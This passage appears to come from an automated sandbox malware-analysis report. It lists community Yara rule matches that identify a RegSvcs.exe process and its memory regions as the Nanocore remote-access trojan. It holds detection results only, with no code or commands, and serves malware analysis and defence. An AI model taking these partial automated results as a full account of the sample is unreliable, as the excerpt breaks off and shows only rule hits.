Source: Yara matchFile source: 9.2.RegSvcs.exe.381ff26.25.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000009.00000002.2388935709.0000000002280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388684959.0000000000910000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388645448.00000000008A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2388334936.00000000004A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388397893.00000000005B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388510368.0000000000770000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2388496518.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388503811.0000000000760000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388517018.0000000000780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2388389251.00000000005A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORYMatched ru